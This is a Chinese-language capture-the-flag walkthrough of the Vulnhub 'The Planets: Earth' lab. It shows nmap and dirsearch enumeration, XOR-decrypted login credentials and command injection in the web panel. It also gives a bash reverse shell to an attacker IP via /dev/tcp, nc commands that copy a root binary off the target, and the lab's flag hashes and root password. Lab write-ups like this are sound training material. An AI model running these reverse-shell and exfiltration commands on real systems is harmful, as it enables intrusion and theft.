Vulnhub靶机渗透：The Planets: Earth 详细教学文档<\/h1>

靶机概述<\/h2>
The Planets: Earth<\/strong> 是一个难度适中的Vulnhub靶机，属于"The Planets"系列，比同系列的"水星"靶机更具挑战性。该靶机包含两个标志：用户标志和root标志，均以MD5哈希形式存储。靶机已在VirtualBox上测试通过，VMware环境可能存在兼容性问题。<\/p>

环境准备<\/h2>

靶机IP：192.168.163.138<\/li>
攻击机：Kali Linux或其他渗透测试发行版<\/li>
网络配置：确保攻击机和靶机在同一网络段<\/li> <\/ol>
渗透测试流程<\/h2>
一、信息收集阶段<\/h3>
1. 初始扫描<\/h4>
使用nmap进行基本端口扫描：<\/p>
nmap -T4 -sT 192.168.163.138 <\/span><\/span><\/code><\/pre>2. 详细服务扫描<\/h4> 获取更详细的服务版本信息：<\/p> nmap -T4 -sV -A 192.168.163.138 <\/span><\/span><\/code><\/pre>扫描结果显示80端口开放，推测存在Web服务。<\/p> 3. Web服务访问<\/h4> 访问靶机80端口，发现Web页面显示域名信息。需要将域名添加到hosts文件：<\/p> vim \/etc\/hosts <\/span><\/span><\/code><\/pre>添加条目：<\/p> 192.168.163.138 earth.local terratest.earth.local <\/code><\/pre> 二、Web应用分析<\/h3> 1. 目录遍历<\/h4> 使用dirsearch工具进行目录扫描：<\/p> dirsearch -u https:\/\/earth.local <\/span><\/span><\/code><\/pre>发现\/admin登录界面。<\/p> 对子域名进行扫描：<\/p> dirsearch -u https:\/\/terratest.earth.local\/ <\/span><\/span><\/code><\/pre>发现robots.txt文件，查看后发现testingnotes文件。<\/p> 2. 文件分析<\/h4> 在testingnotes中发现testdata.txt文件，并提示该文件使用XOR加密。推测该文件可能包含密钥信息。<\/p> 3. XOR解密<\/h4> 对testdata.txt进行XOR解密（具体解密方法需根据文件内容确定，文中未提供详细解密过程）。<\/p> 三、漏洞利用<\/h3> 1. 登录Web应用<\/h4> 使用解密获得的凭据登录：<\/p> 用户名：terra<\/li> 密码：earthclimatechangebad4humans<\/li> <\/ul> 2. 命令执行漏洞利用<\/h4> 登录后尝试命令注入：<\/p> find \/ -name "*flag*"<\/span> <\/span><\/span><\/code><\/pre>发现用户标志文件：<\/p> \/var\/earth_web\/user_flag.txt <\/code><\/pre> 查看内容获取第一个flag：<\/p> cat \/var\/earth_web\/user_flag.txt <\/span><\/span><\/code><\/pre>结果为：user_flag_3353b67d6437f07ba7d34afd7d2fc27d<\/code><\/p> 3. 反弹Shell尝试<\/h4> 直接尝试反弹Shell失败：<\/p> bash -i >& \/dev\/tcp\/192.168.163.136\/8023 0>&1<\/span> <\/span><\/span><\/code><\/pre>提示禁止远程连接。<\/p> 4. 十六进制IP转换<\/h4> 将攻击机IP转换为十六进制格式后尝试（具体转换方法未详细说明）。<\/p> 四、权限提升<\/h3> 1. 用户枚举<\/h4> 查看系统用户：<\/p> cat \/etc\/passwd <\/span><\/span><\/code><\/pre>发现存在root和earth用户。<\/p> 2. 查找高权限文件<\/h4> 发现\/usr\/bin\/reset_root文件，尝试执行但缺少依赖文件。<\/p> 3. 文件传输<\/h4> 将reset_root文件传输到攻击机分析：攻击机监听：<\/p> nc -nlvp 8026<\/span> > reset_root <\/span><\/span><\/code><\/pre>靶机发送：<\/p> nc 192.168.163.136 8026<\/span> < \/usr\/bin\/reset_root <\/span><\/span><\/code><\/pre>4. 文件分析<\/h4> 分析reset_root文件发现需要三个特定文件，在靶机中创建这些文件后再次执行。<\/p> 5. 获取root密码<\/h4> 执行reset_root后获得root密码：Earth<\/code><\/p> 6. 提权<\/h4> 使用root密码提权，获取root标志：<\/p> root_flag_b0da9554d29db2117b02aa8b66ec492e <\/code><\/pre> 关键知识点总结<\/h2> 信息收集<\/strong>：nmap扫描、子域名枚举、目录遍历<\/li> 加密分析<\/strong>：XOR加密文件的分析与解密<\/li> Web漏洞<\/strong>：命令注入漏洞的发现与利用<\/li> 权限提升<\/strong>：高权限二进制文件的分析与利用<\/li> 绕过限制<\/strong>：IP十六进制转换绕过连接限制<\/li> <\/ol> 注意事项<\/h2> VMware环境可能存在兼容性问题，建议使用VirtualBox<\/li> 反弹Shell时可能遇到连接限制，需要灵活应对<\/li> 高权限二进制文件分析时注意依赖关系<\/li> 社工尝试（如利用earth用户名）在本靶机中未成功<\/li> <\/ol> 联系方式<\/h2> 如有问题可联系作者：SirFlash@protonmail.com（回复可能较慢）<\/p>